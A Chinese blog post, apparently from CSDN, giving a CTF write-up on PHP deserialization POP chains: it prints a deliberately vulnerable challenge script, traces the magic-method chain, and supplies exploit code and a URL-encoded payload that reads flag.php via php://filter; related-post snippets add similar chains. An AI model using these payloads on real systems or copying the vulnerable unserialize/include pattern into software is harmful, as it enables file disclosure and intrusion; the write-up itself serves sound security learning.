pop链例题

已于 2022-05-15 17:06:04 修改
阅读量858 收藏 6
点赞数 4
文章标签: 学习
于 2022-05-01 18:30:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/124530196
版权

 

目录

例题

流程

exp 

pop就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。

例题

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。

__destruct() //对象被销毁时触发

__isset() //在不可访问的属性上调用isset()或empty()触发

__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

流程

Road_is_Long:-wakeup.page
      $page=new Road_is_Long
                $string=new Make_a_Change
                            $effort=new Try_Work_Hard
                                     $var='php://filter/read=convert.base64-encode/resource=flag.php'; 

exp 

<?php
class Try_Work_Hard{
   
 protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Road_is_Long{
public $page;

public $string;
}
class Make_a_Change{
    
public $effort;
}

$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();

$a -> page=$b;
$b -> string=$c;
$c -> effort =$d;

echo urlencode(serialize($a));

payload:

O%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A{s%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A{s%3A6%3A"%00*%00var"%3Bs%3A57%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php"%3B}}}s%3A6%3A"string"%3BN%3B}

get传参

 base64解密得出flag

S@Kura
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
栈溢出基础——ROP1.0的例题
07-13
这些指令可能包括但不限于:pop reg; ret(弹出寄存器内容并返回)、mov reg, [addr]; ret(将内存地址的值移动到寄存器并返回)等。 3. 设计输入:根据找到的gadgets,构建一个包含这些地址的payload,使得程序在...
js例题欣赏
07-23
数组方法如`push`, `pop`, `slice`等,对象方法如`hasOwnProperty`等,都是常用操作。 5. 函数参数默认值与剩余参数: 从ES6开始,函数参数可以设置默认值,如`function greet(name = "world") {...}`。剩余参数...
pop链复习
m0_56059226的博客
09-17 242
直接以一道题目来复习一下pop链吧 <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; funct
PHP反序列化构造POP链小练习
末初的CSDN博客
05-13 878
一个师傅给的源码,来源不知,就当作小练习记录一下 <?php error_reporting(0); class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); } } .
一道构造pop链的反序列化题
BerL1n
10-01 700
最近在回顾php反序列化知识时遇到了一道题,感觉知识点挺多的,可以全面复习下反序列化。
ctf-pop
qq_32445755的博客
05-15 1877
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
pop链1
weixin_44047654的博客
09-25 262
pop链题目函数try.php 文件解题思路: 题目函数 <?php error_reporting(0); include("./try.php"); if(isset($_GET['fn'])){ if(check_fn($_GET['fn'])){ include($_GET['fn']); } }else{ unserialize($_GET['code']); } highlight_file(__FILE__); ?> 题目中包
数据结构1800例题与答案.rar
06-16
3. **栈**:栈是一种后进先出(LIFO)的数据结构,常用的操作有压栈(push)、弹栈(pop)、查看栈顶元素(peek)。栈常用于函数调用、表达式求值等场景。 4. **队列**:队列是一种先进先出(FIFO)的数据结构,...
数据结构1800例题与答案(html版本.rar
10-14
栈的主要操作是压栈(push)和弹栈(pop)。 4. **队列**:遵循“先进先出”(FIFO)原则,常用于任务调度、缓冲区管理等。队列的主要操作是入队(enqueue)和出队(dequeue)。 5. **树**:是一种非线性数据结构...
JavaScript权威指南第六版例题源码
08-19
这里提供的"JavaScript权威指南第六版例题源码"包含了书中所有示例的代码,让你能够亲手运行和调试,从而深化对JavaScript的理解。 1. **变量与数据类型**:JavaScript是一种动态类型语言,允许声明变量时不用指定...
CTF里WEB题中的POP
dangejinghong的博客
09-03 398
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
POP链挖掘
萍水间人的小天地
02-19 278
Laravel mockery组件 exp: <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $event; protected $events; public function __construct($events,$event) ...
7.level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法]
qwsn
01-01 2140
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level7-[本地复现]-[简单的pop链]-[addslashes函数功能]-[toString魔术方法]-[call魔术方法] pop链的实质是:a类的实例化对象是b类的成员属性值,b类的实例化对象是c
[MRCTF2020]Ezpop --对pop链构造的简单理解
StevenOnesir的博客
12-31 3156
  简单的序列化攻击是因为对魔术方法的自动调用而触发漏洞,但如果关键代码不在魔术方法,而是在一个类的普通方法中,则需要观察联系类与函数之间的关系,将其与魔术方法的利用结合起来,这时候就可以利用pop链的构造与攻击。 首先题目界面直接给出了源码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2277
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
python学习之类与魔法函数
shadow20112011的博客
10-29 126
类 python中类(class)的元素组成:类属性和类中方法。 通常情况下,可以为类添加任意属性,但是为了限制class的属性的任意添加,需要引用一个特殊是类属性:__slots__,使用后,在某些情况下,可以节约大量内存空间。 class test(object): __slots__ = ('name', 'age') def __init__(self, name, age...
babyGo(安恒2019.1 pop链的构造)
stepone4ward的博客
02-24 2202
周周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。 再看一看这道题目的baby类 也就是说这道题目中的类baby调用了sec类的read()方法。l 但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。 这个时候就要利用最开始提到的...
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1363
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
CTF笔记 [SWPUCTF 2021 新生赛]pop
qq_51248658的博客
10-28 2533
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
php反序列化pop
最新发布
10-17
PHP反序列化POP链是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP链是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用链,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。 下面是一个简单的POP链示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public $c; function __construct($c) { $this->c = $c; } function __destruct() { if (isset($this->c)) { unserialize($this->c); } } } class C { public $cmd; function __construct($cmd) { $this->cmd = $cmd; } } $cmd = 'ls -al'; $c = new C($cmd); $b = new B(serialize($c)); $a = new A(serialize($b)); $payload = serialize($a); ``` 在上面的代码中,我们构造了三个类A、B、C,其中类A包含一个成员变量$b,类B包含一个成员变量$c,类C包含一个成员变量$cmd。我们通过构造一个对象引用链,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,最终执行$cmd变量中存储的命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值